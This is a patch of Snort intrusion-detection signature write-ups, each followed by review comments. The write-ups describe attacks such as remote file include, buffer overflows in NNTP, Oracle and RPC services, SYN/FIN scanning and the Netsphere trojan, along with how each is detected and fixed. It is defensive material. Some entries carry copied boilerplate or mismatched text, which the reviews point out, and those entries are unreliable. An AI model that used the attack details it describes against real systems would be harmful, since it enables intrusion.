+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BosClassifieds
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
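Review bot: the third Detailed Information paragraph and Attack Scenarios describe credential attacks ("An attacker can access an authentication mechanism and supply his/her own credentials") that have nothing to do with the remote file include via "insPath" in "index.php" that Summary describes; replace them with the RFI scenario (a URL to attacker-hosted PHP supplied as insPath and included by the server). "ona web server" should be "on a web server", and "an exploitation attempt has been attempted" is redundant. Additional References is empty, and Affected Systems ("All systems running CGI applications using BosClassifieds") should give the vulnerable version if known.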
--- /dev/null
+++ b/doc/signatures/2430.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2430
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
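Review bot: Detailed Information says only that "a buffer overflow condition" exists somewhere in the INN server; the entry should say which NNTP command or input the rule inspects, otherwise "False Positives: None known." is unverifiable. "ISC INN 2.4 .0" has a stray space (2.4.0), and since Corrective Action is "Upgrade to the latest non-affected version of the software", Affected Systems should state the first fixed version. Additional References is empty.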
--- /dev/null
+++ b/doc/signatures/988.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+988
+--
+Summary:
+This event is generated when an attempt is made to access the Windows Security Accounts Manager (SAM) password file via a web request.
+
+--
+Impact:
+Information gathering - An attacker tried to get the Windows password file
+
+--
+Detailed Information:
+The SAM password file contains Windows logins which are NTLM or LANMAN hashes on Windows NT/2K/XP hosts.
+
+The hash algorithms are weak and can be cracked within few minutes/hours if passwords are weak.
+
+--
+Affected Systems:
+Windows NT 3.x and 4.0
+
+--
+Attack Scenarios:
+If an attacker can get the real SAM file and is able to gain clear text passwords, the host can be compromised using the Administrator's login.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are available. The host may be already compromised depending on the password strength used on the server.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Change all Windows passwords.
+
+Apply appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+
+--
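Review bot: Affected Systems lists only "Windows NT 3.x and 4.0" while Detailed Information says the SAM holds hashes "on Windows NT/2K/XP hosts"; reconcile the two. Corrective Action ("Apply appropriate vendor supplied patches", "Upgrade to the latest non-affected version of the software") does not fit an event that is a web request for a file: what the reader needs is to confirm that the SAM, or a backup copy of it, is not reachable under the web root, and to change passwords only if it was. Grammar: "can be cracked within few minutes/hours" should be "within minutes or hours". Layout: the blank line before "--" after the Sid is missing.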
--- /dev/null
+++ b/doc/signatures/3361.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3361
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
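Review bot: this entry is a word-for-word copy of 3214.txt earlier in this patch (same Summary, Detailed Information, Attack Scenarios and Corrective Action), so nothing tells the reader how rule 3361 differs from rule 3214 (a different transport, port or pattern?); add a sentence identifying what this rule specifically matches, and fix "Expoit" in Ease of Attack in both copies.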
--- /dev/null
+++ b/doc/signatures/1056.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1056
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
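Review bot: as with the 1851.txt entry, this is generic web-server text that does not say what rule 1056 matches; the two entries are identical, which suggests a template was committed without the rule-specific fields being filled in. Add the URI or content the rule inspects, the product affected, and a reference; until then "False Positives: None known." and "Ease of Attack: Simple. Exploits exist." are unsupported.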
--- /dev/null
+++ b/doc/signatures/624.txt
@@ -0,0 +1,64 @@
+Rule:
+--
+Sid:
+624
+
+--
+Summary:
+A tcp packet with it's SYN and FIN flags set was detected.
+
+--
+Impact:
+Information regarding firewall rulesets, open/closed ports, ACLs, and
+possibly even OS type is possible.  This technique can also be used to
+bypass certain firewalls or traffic filtering/shaping devices.
+
+--
+Detailed Information:
+A tcp packet with it's SYN and FIN flags set was detected.  Most
+stacks will respond with an ACK SYN indicating that the port was open,
+whereas a closed port will illicit an ACK RST.  
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of information gathering leading up to another (more directed)
+attack, an attacker may attempt to figure out what ports are
+open/closed on a remote machine.
+
+--
+Ease of Attack:
+Intermediate.  To initiate an attack of this type, an attacker either
+needs a tool that can send packets with the SYN and FIN flags set or
+the ability to craft their own packets.  The former is easy, the later
+requires a more advanced skillset.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine if this particular port would have responded as being open
+or closed.  If open, watch for more attacks on this particular service
+or from the remote machine that sent the packet.  If closed, simply
+watch for more traffic from this host.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+--
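Review bot: Affected Systems is empty; Detailed Information's "Most stacks will respond with an ACK SYN" implies the entry should read "Any TCP/IP stack" or similar. Spelling and wording: "it's" in Summary and Detailed Information should be "its", "illicit" should be "elicit", "the later requires" should be "the latter requires", and "unkown" in Contributors should be "unknown". The flag combinations would also read better in the usual order (SYN/ACK, RST/ACK).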
--- /dev/null
+++ b/doc/signatures/100000761.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000761
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "PHPWebGallery" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "keyword" parameter in the "comments.php" script used by the "PHPWebGallery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPWebGallery
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
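Review bot: Impact ("system integrity compromise", "Possible unauthorized administrative access to the server", "execution of arbitrary code") and the second Detailed Information paragraph ("execute system binaries") overstate a cross-site scripting bug; Attack Scenarios itself gives the real impact, "a malicious link designed to steal information from a user clicking on that link", so Impact should describe client-side script execution and session or credential theft, not server compromise. The "--" before "Affected Systems:" is missing its preceding blank line, and Affected Systems should name the vulnerable PHPWebGallery version if known.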
--- /dev/null
+++ b/doc/signatures/2116.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2116
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the cgi script chipcfg.cgi.
+
+--
+Impact:
+Information gathering. This is an attempt to gain information about the network device and possibly other network information.
+
+--
+Detailed Information:
+The IPC@CHIP is used in network devices for remote access and configuration of the device. It includes an embedded web server, ftp server and telnet daemon.
+
+This could be an attempt to gain intelligence about the device confguration or information on the rest of the network the device is connected to.
+
+--
+Attack Scenarios:
+The attacker merely needs to make an HTTP GET request for the chipcfg.cgi script.
+
+--
+Ease of Attack:
+Simple HTTP GET.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+The script can be rmoved from the device by using the function CGI_REMOVE. Check vendor documentation for details.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2767
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1341
+
+CERT:
+http://www.kb.cert.org/vuls/id/574739
+
+CGI Security:
+http://www.cgisecurity.com/archive/webservers/chip_multi_holes_and_webserver.txt
+
+--
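Review bot: the entry has no Affected Systems section at all (Detailed Information jumps straight to Attack Scenarios), unlike every other entry in this patch; add one naming the IPC@CHIP firmware covered by the Bugtraq and CERT references. Typos: "confguration" and "rmoved". Corrective Action could also note that the embedded web server can be disabled or firewalled if the device does not need it, since removing one CGI script with CGI_REMOVE only closes this particular disclosure.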
--- /dev/null
+++ b/doc/signatures/291.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+291
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in the Cassandra NNTP service.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+The denial of service is caused by providing an unusually long login
+name.  The rule looks for a data payload of over 512 characters.
+
+--
+Affected Systems:
+	Cassandra NNTP server v1.10
+
+--
+Attack Scenarios:
+The attack is done remotely and causes denial of service.
+
+--
+Ease of Attack:
+Simple.  An exploit is readily available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the available security patches from your vendor.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS274
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCAN-2000-0341
+
+--
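Review bot: the CVE link in Additional References is broken: "cvename.cgi?name=3DCAN-2000-0341" contains a quoted-printable "=3D" where "=" should be, so the URL will not resolve; it should read "name=CAN-2000-0341". Summary calls this "a buffer overflow" while Impact lists only "Denial of Service"; either say code execution has not been shown or align the two sections. Detailed Information's "The rule looks for a data payload of over 512 characters" is exactly the rule-specific detail the other entries lack and should stay.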
--- /dev/null
+++ b/doc/signatures/1369.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+1369
+
+--
+Summary:
+Attempted ps command access via web
+
+--
+Impact:
+Attempt to gain information on system files and filestructure
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the filesystem on a webserver. The ls command lists the files and filesystem layout on a UNIX or Linux based system. The attacker could possibly gain information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/ls'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. 
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1368
+
+--
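Review bot: Summary says "Attempted ps command access via web" but Detailed Information and Attack Scenarios describe "/bin/ls" and "The ls command lists the files"; one of them is wrong, and the "sid: 1368" reference under Additional References suggests the ls text was copied from that entry and the ps-specific description never written. Rewrite Detailed Information for ps (a process listing reveals running services and users, not filesystem layout) and fix Impact accordingly. Also missing: an Affected Systems section, a space in "'/bin/ls'in the URI", and "it's designated web root" should be "its".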
--- /dev/null
+++ b/doc/signatures/155.txt
@@ -0,0 +1,95 @@
+Rule:
+
+--
+Sid:
+155
+
+--
+Summary:
+Netsphere is a Trojan Horse offering the attacker access to the victims 
+filesystem, instant messaging clients and some control over peripherals.
+This event is generated when a Netsphere server responds to an attackers
+client.
+
+--
+Impact:
+Compromise of data integrity on the victim host as well as the 
+possibility of rendering the machine temporarily unusable.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Netsphere
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+The Trojan also gives the attacker the ability to access the victims 
+filesystem, turn the monitor on and off, control the mouse, access 
+instant messaging applications and render a pentium based machine 
+unusable.
+
+The Trojan is also known to use TCP ports 30100, 30101 and 30102.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named NetSphereServer.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	NSSX
+
+Removal of this entry is required.
+
+Delete the file NetSphereServer.exe.
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS76
+
+--
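Review bot: Corrective Action gives its steps in an order that does not work on Windows: "Delete the file NetSphereServer.exe." comes before "Ending the Trojan process is also necessary", but a running executable cannot be deleted, so the process must be terminated first, then the file and the registry entry removed. Two smaller points in the same hunk: "NSSX" under "Registry keys added are:" is a value under the listed Run key rather than a key, and the wording should say so; and this file has no "Affected Systems:" section (the OS list sits inside Detailed Information), unlike the other signature files in this patch. The sentence "The Trojan server is named NetSphereServer.exe." belongs in Detailed Information, not Ease of Attack. Spelling: "sever" should be "server", "victims" and "attackers" need the possessive apostrophe, and "pentium" should be "Pentium".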
--- /dev/null
+++ b/doc/signatures/2640.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2640
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
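Review bot: The sentence about "$ORACLE_PORTS" in Detailed Information reads as if it were an Oracle server setting, but it is the Snort configuration variable the rule's port list refers to; say so explicitly, and say why the value "any" is needed on Windows, otherwise an administrator will look for an Oracle option of that name. Also "a Oracle database" should be "an Oracle database", "gowner" is called a "variable" in Attack Scenarios but a "parameter" in Detailed Information (use "parameter" in both), and the Affected Systems entry is indented with spaces where the other files use a tab.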
--- /dev/null
+++ b/doc/signatures/2012.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2012
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to connect 
+to CVS using the credentials of a user with escalated privileges. Should
+this attempt be succesful the entire CVS repository may be compromised.
+
+--
+Detailed Information:
+This rule detects attempts to connect to a CVS repository that fail due 
+determined activity by an attacker to gain unauthorized access to the 
+CVS respository.
+
+The source code of software in the repository may be compromised by a 
+succesful attacker who could choose to insert malicious code of his own 
+making.
+
+For CVS daemons running under changed root conditions (chroot), the rest
+of the operating system files may be protected but the entire CVS 
+directory structure and contents is vulnerable.
+
+--
+Affected Systems:
+	All versions of CVS
+	
+--
+Attack Scenarios:
+This may be an intelligence gathering activity or an attempt to log in 
+to CVS using the credentials of an authorized user.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+It is possible that the cvsroot on the server is misconfigured. Check 
+permissions on the cvsroot to ensure the repository is writable by the 
+cvsdaemon.
+
+--
+False Negatives:
+Connections to the server using zlib compression will not generate this
+event.
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous cvs access to the server where appropriate.
+
+Maintain checks on the password database and the CVS repository.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVS:
+http://www.cvshome.org/docs/
+
+--
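Review bot: Summary does not say what triggers the event; it only defines CVS. The condition is in Detailed Information ("attempts to connect to a CVS repository that fail due determined activity"), but even there the matched condition (which failure response the rule looks for) is not stated, so an analyst cannot tell this rule from any other CVS rule; move the trigger into Summary and name the matched response. Grammar and spelling in the same hunk: "fail due determined activity" is missing "to", "succesful" (twice) should be "successful", "respository" should be "repository", and the line after the Affected Systems entry is whitespace only. The False Negatives note about zlib compression is exactly the caveat an analyst needs and should stay.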
--- /dev/null
+++ b/doc/signatures/1968.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1968
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
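Review bot: The body of this file is generic boilerplate: Summary names neither the PHP application nor the script and parameter the rule matches, and the text is identical to 1736.txt and 1742.txt in this patch apart from the Sid, so the three documents do not tell an analyst which rule fired on what. Name the application and the matched request in Summary and Detailed Information, as 100000478.txt does. Typos: "running ona web server" should be "on a", and "attackers choosing" needs the possessive apostrophe (twice).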
--- /dev/null
+++ b/doc/signatures/1067.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+1067
+
+--
+Summary:
+This event is generated when the NET command is used for message sending, remote null session connections etc.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+An attacker tried to access the "net" command on a host.
+
+The Windows "net" command is usually not accessible through a webserver, check for possible directory traversal attacks.
+
+Net cannot be used to gain full control of a host, but can establish null sessions on weakly protected Windows hosts for example or to gain information on the network the host is connected to.
+
+--
+Attack Scenarios:
+A web request for the command "net".
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A valid URL request containing the string "net.exe" can generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Protect "net.exe" from remote usage. Remove the file completly if it is 
+not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+
+-- 
+Additional References:
+
+--
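Review bot: Summary and Detailed Information describe different things: Summary says the event fires "when the NET command is used for message sending, remote null session connections etc.", but Attack Scenarios and False Positives show the rule actually matches a web request containing "net.exe". Rewrite Summary to state the HTTP condition, and add an "Affected Systems:" section (Windows web servers) as the other files have. Spelling: "completly" should be "completely". The "-- " separator before Additional References carries trailing whitespace.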
--- /dev/null
+++ b/doc/signatures/2994.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2994
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
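Review bot: Impact is just "Serious." while the actual consequence (remote shutdown, a Denial of Service for the host) is only stated in Detailed Information; move that into Impact. The last Corrective Action item, "Disallow remote registry manipulation", is not connected to anything the text describes; if the advice is there because the remote shutdown call is served over the same interface as remote registry access, say so, otherwise a reader will drop it as irrelevant. Minor: "None Known." under False Negatives should be "None known." to match the rest of the patch.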
--- /dev/null
+++ b/doc/signatures/100000478.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000478
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "aWebNews" application running on a webserver. 
+Access to the file "visview.php" using a remote file being passed as the 
+"path_to_news" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "path_to_news" parameter in the "visview.php" script 
+used by the "aWebNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using aWebNews
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
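Review bot: The third paragraph of Detailed Information and the whole of Attack Scenarios are the generic CGI "credentials of a client host" boilerplate and do not describe a remote file include: the condition this rule matches is a remote file supplied in the "path_to_news" parameter of "visview.php", and the scenario should say that rather than "supply his/her own credentials". Also: "an exploitation attempt has been attempted" is redundant (say "an exploit attempt has been made"), "running ona web server" should be "on a", Affected Systems should name the aWebNews versions rather than "All systems running CGI applications using aWebNews", and the hunk deviates from the template with no blank line before the "--" after Sid, Affected Systems and Contributors, plus a trailing blank line at end of file.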
--- /dev/null
+++ b/doc/signatures/3117.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3117
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
